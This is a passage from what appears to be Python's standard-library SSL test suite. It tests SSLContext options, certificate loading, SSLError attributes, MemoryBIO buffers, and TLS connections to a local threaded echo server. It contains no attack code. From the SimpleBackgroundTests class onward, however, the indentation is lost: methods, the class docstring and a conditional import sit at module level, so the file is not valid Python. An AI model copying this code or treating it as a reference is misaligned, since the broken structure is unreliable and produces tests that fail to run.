                'connect_renegotiate': 0,
                'accept': 0,
                'accept_good': 0,
                'accept_renegotiate': 0,
                'hits': 0,
                'misses': 0,
                'timeouts': 0,
                'cache_full': 0,
            })

    def test_set_default_verify_paths(self):
        # There's not much we can do to test that it acts as expected,
        # so just check it doesn't crash or raise an exception.
        ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
        ctx.set_default_verify_paths()

    @unittest.skipUnless(ssl.HAS_ECDH, "ECDH disabled on this OpenSSL build")
    def test_set_ecdh_curve(self):
        ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
        # both str and bytes curve names are accepted
        ctx.set_ecdh_curve("prime256v1")
        ctx.set_ecdh_curve(b"prime256v1")
        self.assertRaises(TypeError, ctx.set_ecdh_curve)
        self.assertRaises(TypeError, ctx.set_ecdh_curve, None)
        self.assertRaises(ValueError, ctx.set_ecdh_curve, "foo")
        self.assertRaises(ValueError, ctx.set_ecdh_curve, b"foo")

    @needs_sni
    def test_sni_callback(self):
        ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
        # set_servername_callback expects a callable, or None
        self.assertRaises(TypeError, ctx.set_servername_callback)
        self.assertRaises(TypeError, ctx.set_servername_callback, 4)
        self.assertRaises(TypeError, ctx.set_servername_callback, "")
        self.assertRaises(TypeError, ctx.set_servername_callback, ctx)
        def dummycallback(sock, servername, ctx):
            pass
        ctx.set_servername_callback(None)
        ctx.set_servername_callback(dummycallback)

    @needs_sni
    def test_sni_callback_refcycle(self):
        # Reference cycles through the servername callback are detected
        # and cleared.
        ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
        def dummycallback(sock, servername, ctx, cycle=ctx):
            pass
        ctx.set_servername_callback(dummycallback)
        wr = weakref.ref(ctx)
        del ctx, dummycallback
        gc.collect()
        self.assertIs(wr(), None)

    def test_cert_store_stats(self):
        ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
        self.assertEqual(ctx.cert_store_stats(),
            {'x509_ca': 0, 'crl': 0, 'x509': 0})
        # load_cert_chain() does not populate the *verification* store
        ctx.load_cert_chain(CERTFILE)
        self.assertEqual(ctx.cert_store_stats(),
            {'x509_ca': 0, 'crl': 0, 'x509': 0})
        ctx.load_verify_locations(CERTFILE)
        self.assertEqual(ctx.cert_store_stats(),
            {'x509_ca': 0, 'crl': 0, 'x509': 1})
        ctx.load_verify_locations(CAFILE_CACERT)
        self.assertEqual(ctx.cert_store_stats(),
            {'x509_ca': 1, 'crl': 0, 'x509': 2})

    def test_get_ca_certs(self):
        ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
        self.assertEqual(ctx.get_ca_certs(), [])
        # CERTFILE is not flagged as X509v3 Basic Constraints: CA:TRUE
        ctx.load_verify_locations(CERTFILE)
        self.assertEqual(ctx.get_ca_certs(), [])
        # but CAFILE_CACERT is a CA cert
        ctx.load_verify_locations(CAFILE_CACERT)
        self.assertEqual(ctx.get_ca_certs(),
            [{'issuer': ((('organizationName', 'Root CA'),),
                         (('organizationalUnitName', 'http://www.cacert.org'),),
                         (('commonName', 'CA Cert Signing Authority'),),
                         (('emailAddress', 'support@cacert.org'),)),
              'notAfter': asn1time('Mar 29 12:29:49 2033 GMT'),
              'notBefore': asn1time('Mar 30 12:29:49 2003 GMT'),
              'serialNumber': '00',
              'crlDistributionPoints': ('https://www.cacert.org/revoke.crl',),
              'subject': ((('organizationName', 'Root CA'),),
                          (('organizationalUnitName', 'http://www.cacert.org'),),
                          (('commonName', 'CA Cert Signing Authority'),),
                          (('emailAddress', 'support@cacert.org'),)),
              'version': 3}])
        # binary (DER) form is returned when passing True
        with open(CAFILE_CACERT) as f:
            pem = f.read()
        der = ssl.PEM_cert_to_DER_cert(pem)
        self.assertEqual(ctx.get_ca_certs(True), [der])

    def test_load_default_certs(self):
        ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
        ctx.load_default_certs()
        ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
        ctx.load_default_certs(ssl.Purpose.SERVER_AUTH)
        ctx.load_default_certs()
        ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
        ctx.load_default_certs(ssl.Purpose.CLIENT_AUTH)
        # the purpose must be a Purpose member, not None or a string
        ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
        self.assertRaises(TypeError, ctx.load_default_certs, None)
        self.assertRaises(TypeError, ctx.load_default_certs, 'SERVER_AUTH')

    @unittest.skipIf(sys.platform == "win32", "not-Windows specific")
    def test_load_default_certs_env(self):
        # SSL_CERT_DIR / SSL_CERT_FILE are honoured on non-Windows
        ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
        with support.EnvironmentVarGuard() as env:
            env["SSL_CERT_DIR"] = CAPATH
            env["SSL_CERT_FILE"] = CERTFILE
            ctx.load_default_certs()
            self.assertEqual(ctx.cert_store_stats(), {"crl": 0, "x509": 1, "x509_ca": 0})

    @unittest.skipUnless(sys.platform == "win32", "Windows specific")
    def test_load_default_certs_env_windows(self):
        # on Windows the env vars add to the system stores' certs
        ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
        ctx.load_default_certs()
        stats = ctx.cert_store_stats()
        ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
        with support.EnvironmentVarGuard() as env:
            env["SSL_CERT_DIR"] = CAPATH
            env["SSL_CERT_FILE"] = CERTFILE
            ctx.load_default_certs()
            stats["x509"] += 1
            self.assertEqual(ctx.cert_store_stats(), stats)

    def test_create_default_context(self):
        ctx = ssl.create_default_context()
        self.assertEqual(ctx.protocol, ssl.PROTOCOL_SSLv23)
        self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
        self.assertTrue(ctx.check_hostname)
        self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
        self.assertEqual(
            ctx.options & getattr(ssl, "OP_NO_COMPRESSION", 0),
            getattr(ssl, "OP_NO_COMPRESSION", 0),
        )
        # the CA-loading keyword arguments are accepted together
        with open(SIGNING_CA) as f:
            cadata = f.read()
        ctx = ssl.create_default_context(cafile=SIGNING_CA, capath=CAPATH,
                                         cadata=cadata)
        self.assertEqual(ctx.protocol, ssl.PROTOCOL_SSLv23)
        self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
        self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
        self.assertEqual(
            ctx.options & getattr(ssl, "OP_NO_COMPRESSION", 0),
            getattr(ssl, "OP_NO_COMPRESSION", 0),
        )
        # server-side contexts (CLIENT_AUTH purpose) don't verify clients
        # by default and enable the single-use-key options
        ctx = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
        self.assertEqual(ctx.protocol, ssl.PROTOCOL_SSLv23)
        self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
        self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
        self.assertEqual(
            ctx.options & getattr(ssl, "OP_NO_COMPRESSION", 0),
            getattr(ssl, "OP_NO_COMPRESSION", 0),
        )
        self.assertEqual(
            ctx.options & getattr(ssl, "OP_SINGLE_DH_USE", 0),
            getattr(ssl, "OP_SINGLE_DH_USE", 0),
        )
        self.assertEqual(
            ctx.options & getattr(ssl, "OP_SINGLE_ECDH_USE", 0),
            getattr(ssl, "OP_SINGLE_ECDH_USE", 0),
        )

    def test__create_stdlib_context(self):
        # the stdlib-internal factory defaults to no verification
        ctx = ssl._create_stdlib_context()
        self.assertEqual(ctx.protocol, ssl.PROTOCOL_SSLv23)
        self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
        self.assertFalse(ctx.check_hostname)
        self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
        ctx = ssl._create_stdlib_context(ssl.PROTOCOL_TLSv1)
        self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLSv1)
        self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
        self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
        ctx = ssl._create_stdlib_context(ssl.PROTOCOL_TLSv1,
                                         cert_reqs=ssl.CERT_REQUIRED,
                                         check_hostname=True)
        self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLSv1)
        self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
        self.assertTrue(ctx.check_hostname)
        self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
        ctx = ssl._create_stdlib_context(purpose=ssl.Purpose.CLIENT_AUTH)
        self.assertEqual(ctx.protocol, ssl.PROTOCOL_SSLv23)
        self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
        self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)

    def test_check_hostname(self):
        ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
        self.assertFalse(ctx.check_hostname)
        # Requires CERT_REQUIRED or CERT_OPTIONAL
        with self.assertRaises(ValueError):
            ctx.check_hostname = True
        ctx.verify_mode = ssl.CERT_REQUIRED
        self.assertFalse(ctx.check_hostname)
        ctx.check_hostname = True
        self.assertTrue(ctx.check_hostname)
        ctx.verify_mode = ssl.CERT_OPTIONAL
        ctx.check_hostname = True
        self.assertTrue(ctx.check_hostname)
        # Cannot set CERT_NONE with check_hostname enabled
        with self.assertRaises(ValueError):
            ctx.verify_mode = ssl.CERT_NONE
        ctx.check_hostname = False
        self.assertFalse(ctx.check_hostname)
class SSLErrorTests(unittest.TestCase):
    """Tests for ssl.SSLError and its subclasses: string form, the
    library/reason attributes and subclass selection."""

    def test_str(self):
        # The str() of a SSLError doesn't include the errno
        e = ssl.SSLError(1, "foo")
        self.assertEqual(str(e), "foo")
        self.assertEqual(e.errno, 1)
        # Same for a subclass
        e = ssl.SSLZeroReturnError(1, "foo")
        self.assertEqual(str(e), "foo")
        self.assertEqual(e.errno, 1)

    def test_lib_reason(self):
        # Test the library and reason attributes
        ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
        # a certificate file is not valid DH parameters -> PEM error
        with self.assertRaises(ssl.SSLError) as cm:
            ctx.load_dh_params(CERTFILE)
        self.assertEqual(cm.exception.library, 'PEM')
        self.assertEqual(cm.exception.reason, 'NO_START_LINE')
        s = str(cm.exception)
        self.assertTrue(s.startswith("[PEM: NO_START_LINE] no start line"), s)

    def test_subclass(self):
        # Check that the appropriate SSLError subclass is raised
        # (this only tests one of them)
        ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
        with socket.socket() as s:
            s.bind(("127.0.0.1", 0))
            s.listen()
            c = socket.socket()
            c.connect(s.getsockname())
            c.setblocking(False)
            # a non-blocking handshake cannot complete immediately
            with ctx.wrap_socket(c, False, do_handshake_on_connect=False) as c:
                with self.assertRaises(ssl.SSLWantReadError) as cm:
                    c.do_handshake()
                s = str(cm.exception)
                self.assertTrue(s.startswith("The operation did not complete (read)"), s)
                # For compatibility
                self.assertEqual(cm.exception.errno, ssl.SSL_ERROR_WANT_READ)
class MemoryBIOTests(unittest.TestCase):
    """Behavioral tests for ssl.MemoryBIO, the in-memory byte buffer used
    by the non-socket SSLObject interface."""

    def test_read_write(self):
        """read() drains previously written bytes in FIFO order."""
        buf = ssl.MemoryBIO()
        buf.write(b'foo')
        self.assertEqual(buf.read(), b'foo')
        self.assertEqual(buf.read(), b'')
        # successive writes are concatenated
        buf.write(b'foo')
        buf.write(b'bar')
        self.assertEqual(buf.read(), b'foobar')
        self.assertEqual(buf.read(), b'')
        # sized reads consume the buffer incrementally
        buf.write(b'baz')
        self.assertEqual(buf.read(2), b'ba')
        self.assertEqual(buf.read(1), b'z')
        self.assertEqual(buf.read(1), b'')

    def test_eof(self):
        """eof becomes true only after write_eof() AND a full drain."""
        buf = ssl.MemoryBIO()
        self.assertFalse(buf.eof)
        self.assertEqual(buf.read(), b'')
        self.assertFalse(buf.eof)
        buf.write(b'foo')
        self.assertFalse(buf.eof)
        buf.write_eof()
        self.assertFalse(buf.eof)           # data still pending
        self.assertEqual(buf.read(2), b'fo')
        self.assertFalse(buf.eof)
        self.assertEqual(buf.read(1), b'o')
        self.assertTrue(buf.eof)            # drained and EOF marked
        self.assertEqual(buf.read(), b'')
        self.assertTrue(buf.eof)

    def test_pending(self):
        """pending tracks the number of buffered, unread bytes."""
        buf = ssl.MemoryBIO()
        self.assertEqual(buf.pending, 0)
        buf.write(b'foo')
        self.assertEqual(buf.pending, 3)
        for consumed in range(3):
            buf.read(1)
            self.assertEqual(buf.pending, 3 - consumed - 1)
        for added in range(3):
            buf.write(b'x')
            self.assertEqual(buf.pending, added + 1)
        buf.read()
        self.assertEqual(buf.pending, 0)

    def test_buffer_types(self):
        """write() accepts any bytes-like object."""
        buf = ssl.MemoryBIO()
        for payload in (b'foo', bytearray(b'bar'), memoryview(b'baz')):
            buf.write(payload)
            self.assertEqual(buf.read(), bytes(payload))

    def test_error_types(self):
        """write() rejects str and non-buffer objects with TypeError."""
        buf = ssl.MemoryBIO()
        for bad in ('foo', None, True, 1):
            self.assertRaises(TypeError, buf.write, bad)
@unittest.skipUnless(_have_threads, "Needs threading module")
class SimpleBackgroundTests(unittest.TestCase):
"""Tests that connect to a simple server running in the background"""
def setUp(self):
    # Start one background echo server per test; addCleanup guarantees
    # teardown (server.__exit__) even when the test body fails.
    server = ThreadedEchoServer(SIGNED_CERTFILE)
    self.server_addr = (HOST, server.port)
    server.__enter__()
    self.addCleanup(server.__exit__, None, None, None)
def test_connect(self):
    # CERT_NONE: the handshake succeeds but no peer cert is exposed
    with ssl.wrap_socket(socket.socket(socket.AF_INET),
                         cert_reqs=ssl.CERT_NONE) as s:
        s.connect(self.server_addr)
        self.assertEqual({}, s.getpeercert())
    # this should succeed because we specify the root cert
    with ssl.wrap_socket(socket.socket(socket.AF_INET),
                         cert_reqs=ssl.CERT_REQUIRED,
                         ca_certs=SIGNING_CA) as s:
        s.connect(self.server_addr)
        self.assertTrue(s.getpeercert())
def test_connect_fail(self):
    # This should fail because we have no verification certs. Connection
    # failure crashes ThreadedEchoServer, so run this in an independent
    # test method.
    s = ssl.wrap_socket(socket.socket(socket.AF_INET),
                        cert_reqs=ssl.CERT_REQUIRED)
    self.addCleanup(s.close)
    self.assertRaisesRegex(ssl.SSLError, "certificate verify failed",
                           s.connect, self.server_addr)
def test_connect_ex(self):
    # Issue #11326: check connect_ex() implementation
    # (0 means success, including a completed TLS handshake)
    s = ssl.wrap_socket(socket.socket(socket.AF_INET),
                        cert_reqs=ssl.CERT_REQUIRED,
                        ca_certs=SIGNING_CA)
    self.addCleanup(s.close)
    self.assertEqual(0, s.connect_ex(self.server_addr))
    self.assertTrue(s.getpeercert())
def test_non_blocking_connect_ex(self):
    # Issue #11326: non-blocking connect_ex() should allow handshake
    # to proceed after the socket gets ready.
    s = ssl.wrap_socket(socket.socket(socket.AF_INET),
                        cert_reqs=ssl.CERT_REQUIRED,
                        ca_certs=SIGNING_CA,
                        do_handshake_on_connect=False)
    self.addCleanup(s.close)
    s.setblocking(False)
    rc = s.connect_ex(self.server_addr)
    # EWOULDBLOCK under Windows, EINPROGRESS elsewhere
    self.assertIn(rc, (0, errno.EINPROGRESS, errno.EWOULDBLOCK))
    # Wait for connect to finish
    select.select([], [s], [], 5.0)
    # Non-blocking handshake: retry until OpenSSL no longer wants
    # to read or write, waiting on select() in between
    while True:
        try:
            s.do_handshake()
            break
        except ssl.SSLWantReadError:
            select.select([s], [], [], 5.0)
        except ssl.SSLWantWriteError:
            select.select([], [s], [], 5.0)
    # SSL established
    self.assertTrue(s.getpeercert())
def test_connect_with_context(self):
    # Same as test_connect, but with a separately created context
    ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
    with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
        s.connect(self.server_addr)
        self.assertEqual({}, s.getpeercert())
    # Same with a server hostname
    with ctx.wrap_socket(socket.socket(socket.AF_INET),
                         server_hostname="dummy") as s:
        s.connect(self.server_addr)
    ctx.verify_mode = ssl.CERT_REQUIRED
    # This should succeed because we specify the root cert
    ctx.load_verify_locations(SIGNING_CA)
    with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
        s.connect(self.server_addr)
        cert = s.getpeercert()
        self.assertTrue(cert)
def test_connect_with_context_fail(self):
    # This should fail because we have no verification certs. Connection
    # failure crashes ThreadedEchoServer, so run this in an independent
    # test method.
    ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
    ctx.verify_mode = ssl.CERT_REQUIRED
    s = ctx.wrap_socket(socket.socket(socket.AF_INET))
    self.addCleanup(s.close)
    self.assertRaisesRegex(ssl.SSLError, "certificate verify failed",
                           s.connect, self.server_addr)
def test_connect_capath(self):
    # Verify server certificates using the `capath` argument
    # NOTE: the subject hashing algorithm has been changed between
    # OpenSSL 0.9.8n and 1.0.0, as a result the capath directory must
    # contain both versions of each certificate (same content, different
    # filename) for this test to be portable across OpenSSL releases.
    # Exercise both the str and the bytes flavour of `capath`.
    for path in (CAPATH, BYTES_CAPATH):
        context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
        context.verify_mode = ssl.CERT_REQUIRED
        context.load_verify_locations(capath=path)
        with context.wrap_socket(socket.socket(socket.AF_INET)) as sock:
            sock.connect(self.server_addr)
            peer_cert = sock.getpeercert()
            self.assertTrue(peer_cert)
def test_connect_cadata(self):
    # Load the CA certificate as PEM text, derive its DER form, then
    # check that `cadata` verification accepts either representation.
    with open(SIGNING_CA) as f:
        pem = f.read()
    der = ssl.PEM_cert_to_DER_cert(pem)
    for cadata in (pem, der):
        context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
        context.verify_mode = ssl.CERT_REQUIRED
        context.load_verify_locations(cadata=cadata)
        with context.wrap_socket(socket.socket(socket.AF_INET)) as sock:
            sock.connect(self.server_addr)
            self.assertTrue(sock.getpeercert())
@unittest.skipIf(os.name == "nt", "Can't use a socket as a file under Windows")
def test_makefile_close(self):
    # Issue #5238: creating a file-like object with makefile() shouldn't
    # delay closing the underlying "real socket" (here tested with its
    # file descriptor, hence skipping the test under Windows).
    sock = ssl.wrap_socket(socket.socket(socket.AF_INET))
    sock.connect(self.server_addr)
    fd = sock.fileno()
    fileobj = sock.makefile()
    fileobj.close()
    # Closing the file object must leave the fd open...
    os.read(fd, 0)
    # ...while closing the SSL socket itself must close the fd too.
    sock.close()
    gc.collect()
    with self.assertRaises(OSError) as caught:
        os.read(fd, 0)
    self.assertEqual(caught.exception.errno, errno.EBADF)
def test_non_blocking_handshake(self):
    # Connect first, then wrap in SSL with the handshake deferred, and
    # drive do_handshake() manually on the non-blocking socket.
    s = socket.socket(socket.AF_INET)
    s.connect(self.server_addr)
    s.setblocking(False)
    s = ssl.wrap_socket(s,
                        cert_reqs=ssl.CERT_NONE,
                        do_handshake_on_connect=False)
    self.addCleanup(s.close)
    count = 0
    while True:
        try:
            count += 1
            s.do_handshake()
            break
        except ssl.SSLWantReadError:
            select.select([s], [], [])
        except ssl.SSLWantWriteError:
            select.select([], [s], [])
    if support.verbose:
        sys.stdout.write("\nNeeded %d calls to do_handshake() to establish session.\n" % count)
def test_get_server_certificate(self):
    # Fetch the test server's certificate, verifying it against the
    # signing CA.
    host, port = self.server_addr
    _test_get_server_certificate(self, host, port, cert=SIGNING_CA)
def test_get_server_certificate_fail(self):
    # Connection failure crashes ThreadedEchoServer, so run this in an
    # independent test method
    host, port = self.server_addr
    _test_get_server_certificate_fail(self, host, port)
def test_ciphers(self):
    # Valid cipher strings allow connecting.
    with ssl.wrap_socket(socket.socket(socket.AF_INET),
                         cert_reqs=ssl.CERT_NONE, ciphers="ALL") as s:
        s.connect(self.server_addr)
    with ssl.wrap_socket(socket.socket(socket.AF_INET),
                         cert_reqs=ssl.CERT_NONE, ciphers="DEFAULT") as s:
        s.connect(self.server_addr)
    # Error checking can happen at instantiation or when connecting
    with self.assertRaisesRegex(ssl.SSLError, "No cipher can be selected"):
        with socket.socket(socket.AF_INET) as sock:
            s = ssl.wrap_socket(sock,
                                cert_reqs=ssl.CERT_NONE, ciphers="^$:,;?*'dorothyx")
            s.connect(self.server_addr)
def test_get_ca_certs_capath(self):
    # capath certs are loaded on request
    ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
    ctx.verify_mode = ssl.CERT_REQUIRED
    ctx.load_verify_locations(capath=CAPATH)
    # Nothing loaded yet: capath certificates are read lazily.
    self.assertEqual(ctx.get_ca_certs(), [])
    with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
        s.connect(self.server_addr)
        cert = s.getpeercert()
        self.assertTrue(cert)
    # After the handshake, the CA cert used for verification is visible.
    self.assertEqual(len(ctx.get_ca_certs()), 1)
@needs_sni
def test_context_setget(self):
    # Check that the context of a connected socket can be replaced.
    ctx1 = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
    ctx2 = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
    s = socket.socket(socket.AF_INET)
    with ctx1.wrap_socket(s) as ss:
        ss.connect(self.server_addr)
        self.assertIs(ss.context, ctx1)
        self.assertIs(ss._sslobj.context, ctx1)
        # The swap must be reflected both on the SSLSocket wrapper and
        # on the underlying _ssl object.
        ss.context = ctx2
        self.assertIs(ss.context, ctx2)
        self.assertIs(ss._sslobj.context, ctx2)
def ssl_io_loop(self, sock, incoming, outgoing, func, *args, **kwargs):
    """Pump an SSLObject operation to completion over memory BIOs.

    Repeatedly call func(*args); on SSL_ERROR_WANT_READ or
    SSL_ERROR_WANT_WRITE, move data between *sock* and the
    *incoming*/*outgoing* MemoryBIO pair, then retry.  Returns the
    result of the successful call.  Any other SSLError propagates.
    """
    # NOTE: the local previously named 'errno' shadowed the errno
    # module; renamed to 'want'.  The unused 'timeout' kwarg lookup
    # was dead code and has been removed (kwargs are still accepted
    # for backward compatibility).
    count = 0
    while True:
        want = None
        count += 1
        try:
            ret = func(*args)
        except ssl.SSLError as e:
            if e.errno not in (ssl.SSL_ERROR_WANT_READ,
                               ssl.SSL_ERROR_WANT_WRITE):
                raise
            want = e.errno
        # Get any data from the outgoing BIO irrespective of any error, and
        # send it to the socket.
        buf = outgoing.read()
        sock.sendall(buf)
        # If there's no error, we're done. For WANT_READ, we need to get
        # data from the socket and put it in the incoming BIO.
        if want is None:
            break
        elif want == ssl.SSL_ERROR_WANT_READ:
            buf = sock.recv(32768)
            if buf:
                incoming.write(buf)
            else:
                # Peer closed the connection: signal EOF to OpenSSL.
                incoming.write_eof()
    if support.verbose:
        sys.stdout.write("Needed %d calls to complete %s().\n"
                         % (count, func.__name__))
    return ret
def test_bio_handshake(self):
    # Full handshake and shutdown driven through MemoryBIOs/SSLObject,
    # with the TCP socket handled manually by ssl_io_loop().
    sock = socket.socket(socket.AF_INET)
    self.addCleanup(sock.close)
    sock.connect(self.server_addr)
    incoming = ssl.MemoryBIO()
    outgoing = ssl.MemoryBIO()
    ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
    ctx.verify_mode = ssl.CERT_REQUIRED
    ctx.load_verify_locations(SIGNING_CA)
    ctx.check_hostname = True
    sslobj = ctx.wrap_bio(incoming, outgoing, False, 'localhost')
    self.assertIs(sslobj._sslobj.owner, sslobj)
    # No negotiated state before the handshake.
    self.assertIsNone(sslobj.cipher())
    self.assertIsNone(sslobj.shared_ciphers())
    self.assertRaises(ValueError, sslobj.getpeercert)
    if 'tls-unique' in ssl.CHANNEL_BINDING_TYPES:
        self.assertIsNone(sslobj.get_channel_binding('tls-unique'))
    self.ssl_io_loop(sock, incoming, outgoing, sslobj.do_handshake)
    self.assertTrue(sslobj.cipher())
    # shared_ciphers() is only populated server-side, so still None.
    self.assertIsNone(sslobj.shared_ciphers())
    self.assertTrue(sslobj.getpeercert())
    if 'tls-unique' in ssl.CHANNEL_BINDING_TYPES:
        self.assertTrue(sslobj.get_channel_binding('tls-unique'))
    try:
        self.ssl_io_loop(sock, incoming, outgoing, sslobj.unwrap)
    except ssl.SSLSyscallError:
        # If the server shuts down the TCP connection without sending a
        # secure shutdown message, this is reported as SSL_ERROR_SYSCALL
        pass
    self.assertRaises(ssl.SSLError, sslobj.write, b'foo')
def test_bio_read_write_data(self):
    # Round-trip a payload through an SSLObject wrapped around
    # MemoryBIOs; the echo server lowercases what it receives.
    sock = socket.socket(socket.AF_INET)
    self.addCleanup(sock.close)
    sock.connect(self.server_addr)
    incoming = ssl.MemoryBIO()
    outgoing = ssl.MemoryBIO()
    ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
    ctx.verify_mode = ssl.CERT_NONE
    sslobj = ctx.wrap_bio(incoming, outgoing, False)
    self.ssl_io_loop(sock, incoming, outgoing, sslobj.do_handshake)
    req = b'FOO\n'
    self.ssl_io_loop(sock, incoming, outgoing, sslobj.write, req)
    buf = self.ssl_io_loop(sock, incoming, outgoing, sslobj.read, 1024)
    self.assertEqual(buf, b'foo\n')
    self.ssl_io_loop(sock, incoming, outgoing, sslobj.unwrap)
class NetworkedTests(unittest.TestCase):
    """Tests that talk to real hosts on the Internet.

    Each test is guarded by support.transient_internet(), which turns
    transient network failures into skips rather than errors.
    """

    def test_timeout_connect_ex(self):
        # Issue #12065: on a timeout, connect_ex() should return the original
        # errno (mimicking the behaviour of non-SSL sockets).
        with support.transient_internet(REMOTE_HOST):
            s = ssl.wrap_socket(socket.socket(socket.AF_INET),
                                cert_reqs=ssl.CERT_REQUIRED,
                                do_handshake_on_connect=False)
            self.addCleanup(s.close)
            # An absurdly small timeout so the connect attempt times out.
            s.settimeout(0.0000001)
            rc = s.connect_ex((REMOTE_HOST, 443))
            if rc == 0:
                self.skipTest("REMOTE_HOST responded too quickly")
            self.assertIn(rc, (errno.EAGAIN, errno.EWOULDBLOCK))

    @unittest.skipUnless(support.IPV6_ENABLED, 'Needs IPv6')
    def test_get_server_certificate_ipv6(self):
        # Same certificate retrieval checks as the local tests, but
        # against an IPv6 host.
        with support.transient_internet('ipv6.google.com'):
            _test_get_server_certificate(self, 'ipv6.google.com', 443)
            _test_get_server_certificate_fail(self, 'ipv6.google.com', 443)

    def test_algorithms(self):
        # Issue #8484: all algorithms should be available when verifying a
        # certificate.
        # SHA256 was added in OpenSSL 0.9.8
        if ssl.OPENSSL_VERSION_INFO < (0, 9, 8, 0, 15):
            self.skipTest("SHA256 not available on %r" % ssl.OPENSSL_VERSION)
        # sha256.tbs-internet.com needs SNI to use the correct certificate
        if not ssl.HAS_SNI:
            self.skipTest("SNI needed for this test")
        # https://sha2.hboeck.de/ was used until 2011-01-08 (no route to host)
        remote = ("sha256.tbs-internet.com", 443)
        sha256_cert = os.path.join(os.path.dirname(__file__), "sha256.pem")
        with support.transient_internet("sha256.tbs-internet.com"):
            ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
            ctx.verify_mode = ssl.CERT_REQUIRED
            ctx.load_verify_locations(sha256_cert)
            s = ctx.wrap_socket(socket.socket(socket.AF_INET),
                                server_hostname="sha256.tbs-internet.com")
            try:
                s.connect(remote)
                if support.verbose:
                    sys.stdout.write("\nCipher with %r is %r\n" %
                                     (remote, s.cipher()))
                    sys.stdout.write("Certificate is:\n%s\n" %
                                     pprint.pformat(s.getpeercert()))
            finally:
                s.close()
def _test_get_server_certificate(test, host, port, cert=None):
    # Fetch the peer certificate twice: first without verification,
    # then verified against *cert*.  A non-empty PEM blob must come
    # back both times.
    address = (host, port)
    pem = ssl.get_server_certificate(address)
    if not pem:
        test.fail("No server certificate on %s:%s!" % (host, port))
    pem = ssl.get_server_certificate(address, ca_certs=cert)
    if not pem:
        test.fail("No server certificate on %s:%s!" % (host, port))
    if support.verbose:
        sys.stdout.write("\nVerified certificate for %s:%s is\n%s\n" % (host, port, pem))
def _test_get_server_certificate_fail(test, host, port):
    # Verifying against an unrelated CA (CERTFILE) must raise SSLError;
    # getting a certificate back means verification wrongly succeeded.
    try:
        pem = ssl.get_server_certificate((host, port), ca_certs=CERTFILE)
    except ssl.SSLError as x:
        # expected failure
        if support.verbose:
            sys.stdout.write("%s\n" % x)
    else:
        test.fail("Got server certificate %s for %s:%s!" % (pem, host, port))
if _have_threads:
from test.ssl_servers import make_https_server
class ThreadedEchoServer(threading.Thread):
    """An SSL-capable echo server running in a background thread.

    run() accepts connections and hands each to a ConnectionHandler
    thread.  Usable as a context manager: __enter__ starts the thread
    and waits until the accept loop is live; __exit__ stops and joins.
    Per-connection negotiation results are collected in
    selected_npn_protocols / selected_alpn_protocols / shared_ciphers /
    conn_errors for inspection by the tests.
    """

    class ConnectionHandler(threading.Thread):

        """A mildly complicated class, because we want it to work both
        with and without the SSL wrapper around the socket connection, so
        that we can test the STARTTLS functionality."""

        def __init__(self, server, connsock, addr):
            self.server = server
            self.running = False
            self.sock = connsock
            self.addr = addr
            # Blocking I/O on the connection; the listening socket's
            # timeout drives server shutdown, not this one.
            self.sock.setblocking(1)
            self.sslconn = None
            threading.Thread.__init__(self)
            self.daemon = True

        def wrap_conn(self):
            # Wrap self.sock in SSL.  On failure, record the error,
            # stop the whole server, and return False.
            try:
                self.sslconn = self.server.context.wrap_socket(
                    self.sock, server_side=True)
                self.server.selected_npn_protocols.append(self.sslconn.selected_npn_protocol())
                self.server.selected_alpn_protocols.append(self.sslconn.selected_alpn_protocol())
            except (ssl.SSLError, ConnectionResetError) as e:
                # We treat ConnectionResetError as though it were an
                # SSLError - OpenSSL on Ubuntu abruptly closes the
                # connection when asked to use an unsupported protocol.
                #
                # XXX Various errors can have happened here, for example
                # a mismatching protocol version, an invalid certificate,
                # or a low-level bug. This should be made more discriminating.
                self.server.conn_errors.append(e)
                if self.server.chatty:
